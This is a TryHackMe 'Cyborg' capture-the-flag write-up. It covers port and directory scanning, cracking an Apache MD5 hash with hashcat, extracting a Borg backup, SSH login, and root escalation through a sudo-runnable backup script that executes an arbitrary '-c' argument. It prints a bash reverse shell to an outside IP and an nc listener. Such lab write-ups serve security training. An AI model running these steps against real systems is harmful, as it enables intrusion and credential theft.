Cyborg - TryHackMe

A box involving encrypted archives, source code analysis and more.
This is the write-up for TryHackMe’s room named Cyborg.This can be found here:- https://tryhackme.com/room/cyborgt8
Enumeration
Deploy the the box and run NMAP against the target IP.
NMAP
# Identify the list of services running on the target machine
sudo nmap -sS -Pn -T4 -p- 10.10.236.54

# Perform further information gathering on the open ports identified above
sudo nmap -O -A -Pn -T4 -p22,80 10.10.236.54

We have only 2 services running SSH on port 22 and HTTP on port 80.This info is sufficient to answer first 3 questions.SSH version looks relatively new and thus let’s enumerate the Web Server further by running a gobuster scan.
Gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.236.54 -t 40

Above gobuster scan reveals few more directories which we can look manually via our favorite Web Browser. So lets take a look to check if we can find anything interesting:



So we have a backup named “music_archive” which we can download as “archive.tar” along with a potential password for that archive.Sweet!
Untar the archive file and check if we can find anything further:
tar -xvf archive.tar

Inside these directories we found a README file which tells is that it is a Borg Backup repository. More details here:

We can extract a Borg Backup repository and the details for that can be found here:
https://borgbackup.readthedocs.io/en/stable/usage/extract.html
Use this to install Borg on kali machine:
sudo apt install borgbackup
Extracting a Borg repository needs a passphrase as the backups are encrypted.We have found a hash above in the passwd file, may be that is our passphrase,so lets try to crack it.
This is a Apache style MD5 hash and is supported by Hashcat. We can check it here:

So let’s crack it using rockyou wordlist, put hash in crack.txt and use mode as 1600:
hashcat -m 1600 crack.txt /usr/share/wordlists/rockyou.txt

And we found the plain text for this hash which we will use to extract the Borg archived repository.
borg extract /tmp/home/field/dev/final_archive::music_archive
Enter passphrase for key /tmp/home/field/dev/final_archive:
From the extracted repo we found a file named “note.txt” which contains credential for a user named “alex”

User.txt
We already know that SSH is enabled on the target, so let us use the credential found above with SSH and we can found user.txt in the user’s home directory:
ssh alex@10.10.63.130

Privilege Escalation
Our last task is to escalate our privileges to root user and get the root flag.Let’s check what our current user can run with sudo access:
sudo -l

So user “alex” can run /etc/mp3backups/backup.sh as anyone without any password.Room description gives us a hint that we need to do source code analysis, so let’s read backup.sh shell script:
#!/bin/bash
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txtinput="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
donebackup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"# Where to backup to.
dest="/etc/mp3backups/"# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"echo# Backup the files using tar.
tar czf $dest/$archive_file $backup_files# Print end status message.
echo
echo "Backup finished"cmd=$($command)
echo $cmd
The script seems to be archiving files under /home/alex/Music but if we look closely at the lines highlighted above we can pass command line arguments with ‘-c’ flag and execute arbitrary commands and as this script can be run as anybody, we will run it as root:
sudo -u root /etc/mp3backups/backup.sh -c “/bin/bash”
and then a reverse shell:
bash -i >& /dev/tcp/10.8.98.192/9999 0>&1
Catch the reverse shell on kali to get the root access and the root flag:
nc -nlvp 9999

That it. Hope you enjoyed reading the write-up. This was an easy rated room but the new learning from is Borg which is Deduplicating archiver with compression and authenticated encryption.